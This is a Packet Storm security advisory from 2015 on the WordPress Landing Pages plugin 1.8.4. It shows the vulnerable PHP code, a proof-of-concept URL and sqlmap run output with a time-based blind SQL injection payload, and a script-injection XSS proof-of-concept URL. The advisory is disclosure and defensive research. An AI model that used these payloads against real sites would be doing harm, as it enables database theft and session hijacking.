Exploit the possiblities

WordPress Landing Pages 1.8.4 Cross Site Scripting / SQL Injection

WordPress Landing Pages 1.8.4 Cross Site Scripting / SQL Injection
Posted May 25, 2015
Authored by Adrian M. F.

WordPress Landing Pages plugin version 1.8.4 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
advisories | CVE-2015-4064, CVE-2015-4065
MD5 | 118b7f35fa9da8848b87c26677fd2d54

WordPress Landing Pages 1.8.4 Cross Site Scripting / SQL Injection

Change Mirror Download
# Title: Multiple vulnerabilities in WordPress plugin "WordPress Landing Pages"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/landing-pages/
# Active installs: 20,000+
# Vulnerable version: 1.8.4
# Fixed version: 1.8.5
# CVE: CVE-2015-4064, CVE-2015-4065

Vulnerabilities (2)
=====================

(1) Authenticated SQLi [CWE-89] (CVE-2015-4064)
-----------------------------------------------

* CODE:
modules/module.ab-testing.php:100
+++++++++++++++++++++++++++++++++++++++++
$wpdb->query("
SELECT `meta_key`, `meta_value`
FROM $wpdb->postmeta
WHERE `post_id` = ".$_GET['post']."
");
+++++++++++++++++++++++++++++++++++++++++

* POC:
http://[domain]/wp-admin/post.php?post=306[SQLi]&action=edit&lp-variation-id=1&ab-action=delete-variation

SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/post.php?post=306&action=edit&lp-variation-id=0&ab-action=delete-variation" -p post
[............]
GET parameter 'post' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
---
Parameter: post (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: post=306 AND (SELECT * FROM (SELECT(SLEEP(10)))sCKL)&action=edit&lp-variation-id=0&ab-action=delete-variation
---
[13:35:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++


(2) Authenticated XSS [CWE-79] (CVE-2015-4065)
----------------------------------------------

* CODE:
shared/shortcodes/inbound-shortcodes.php:761
+++++++++++++++++++++++++++++++++++++++++
<iframe src='<?php echo INBOUDNOW_SHARED_URLPATH . 'shortcodes/'; ?>preview.php?sc=&post=<?php echo $_GET['post']; ?>' width="285" scrollbar='true' frameborder="0" id="inbound-shortcodes-preview"></iframe>
+++++++++++++++++++++++++++++++++++++++++


* POC:
http://[domain]/wp-admin/post-new.php?post_type=inbound-forms&post='></iframe><script>alert(String.fromCharCode(88, 83, 83))</script>


Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-20: Vendor notification.
2015-05-20: Vendor response.
2015-05-22: Vendor fix.
2015-05-25: Public disclosure.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    15 Files
  • 15
    Dec 15th
    28 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close